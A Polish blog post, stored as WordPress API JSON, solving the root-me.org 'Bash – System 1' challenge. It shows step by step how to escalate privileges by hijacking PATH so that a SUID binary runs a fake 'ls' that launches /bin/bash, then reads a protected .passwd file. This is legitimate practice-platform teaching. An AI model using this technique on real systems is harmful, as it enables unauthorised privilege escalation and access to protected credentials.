{"id":292,"date":"2019-10-25T18:55:29","date_gmt":"2019-10-25T18:55:29","guid":{"rendered":"http:\/\/www.linuxsystems.ovh\/?p=292"},"modified":"2020-05-25T16:25:28","modified_gmt":"2020-05-25T16:25:28","slug":"root-me-org-zadanie-bash-system-1","status":"publish","type":"post","link":"https:\/\/www.linuxsystems.ovh\/?p=292","title":{"rendered":"root-me.org zadanie: Bash – System 1"},"content":{"rendered":"\n

Dzisiaj poka\u017c\u0119 wam rozwi\u0105zanie zadania „Bash – System 1”
Zadanie polega na tym, aby odczyta\u0107 plik .passwd, do kt\u00f3rego nie mamy uprawnie\u0144, ale oprogramowanie, kt\u00f3re nam dali uprawnienia te ma, za pomoc\u0105 SUID :).<\/p>\n\n\n\n\n\n\n\n

A wi\u0119c do dzie\u0142a \ud83d\ude42<\/p>\n\n\n\n

Na pocz\u0105tek logujemy si\u0119 podanymi danymi do SSH, poleceniem (has\u0142o podane w zadaniu):<\/p>\n\n\n\n

ssh -p 2222 app-script-ch11@challenge02.root-me.org<\/code><\/pre>\n\n\n\n
Nast\u0119pnie po zalogowaniu widzimy kilka plik\u00f3w:<\/p>\n\n\n\n
app-script-ch11@challenge02:~$ ls -l\ntotal 16\n-r--r----- 1 app-script-ch11-cracked app-script-ch11  494 May 19 18:29 Makefile\n-r-sr-x--- 1 app-script-ch11-cracked app-script-ch11 7252 May 19 18:34 ch11\n-r--r----- 1 app-script-ch11-cracked app-script-ch11  187 May 19 18:34 ch11.c\n<\/code><\/pre>\n\n\n\n
Z tego co jest napisane, na samej g\u00f3rze po zalogowaniu mamy informacj\u0119, \u017ce \/tmp i \/var\/tmp jest w trybie RW (czyli mo\u017cna tam co\u015b zapisywa\u0107).<\/p>\n\n\n\n
uruchamiamy program ch11:<\/p>\n\n\n\n
.\/ch11 \n\/challenge\/app-script\/ch11\/.passwd<\/code><\/pre>\n\n\n\n
i tak jak jest napisane w ch11.c (kt\u00f3re mo\u017cemy sprawdzi\u0107 np. poleceniem less):<\/p>\n\n\n\n
ls \/challenge\/app-script\/ch11\/.passwd<\/code><\/pre>\n\n\n\n
jest pokazane, \u017ce taki plik istnieje, jednak my chcemy go odczyta\u0107… jak to zrobi\u0107?<\/p>\n\n\n\n
A gdyby tak podmieni\u0107 komend\u0119 ls na np. \/bin\/bash?<\/p>\n\n\n\n
uruchamiamy polecenie:<\/p>\n\n\n\n
echo \"\/bin\/bash\" > \/tmp\/ls<\/code><\/pre>\n\n\n\n
kt\u00f3re powoduje, \u017ce polecenie ls, jest zast\u0119powane poleceniem \/bin\/bash \ud83d\ude42<\/p>\n\n\n\n
teraz zmieniamy PATH, aby najpierw bra\u0142 te polecenie ls, a nast\u0119pnie dopiero z prawdziwej zmiennej \u015brodowiskowej \ud83d\ude42<\/p>\n\n\n\n
export PATH=\/tmp:$PATH<\/code><\/pre>\n\n\n\n
i uruchamiamy nasz .\/ch11 i jeste\u015bmy w bash, ale zalogowani jako… app-script-ch11-cracked<\/strong> \ud83d\ude42<\/p>\n\n\n\n
teraz tylko robimy cat .passwd i ju\u017c mamy has\u0142o \ud83d\ude42<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Dzisiaj poka\u017c\u0119 wam rozwi\u0105zanie zadania „Bash – System 1”Zadanie polega na tym, aby odczyta\u0107 plik .passwd, do kt\u00f3rego nie mamy uprawnie\u0144, ale oprogramowanie, kt\u00f3re nam dali uprawnienia te ma, za pomoc\u0105 SUID :).<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-292","post","type-post","status-publish","format-standard","hentry","category-bezpieczenstwo-internetowe"],"_links":{"self":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=292"}],"version-history":[{"count":5,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/292\/revisions"}],"predecessor-version":[{"id":506,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/292\/revisions\/506"}],"wp:attachment":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}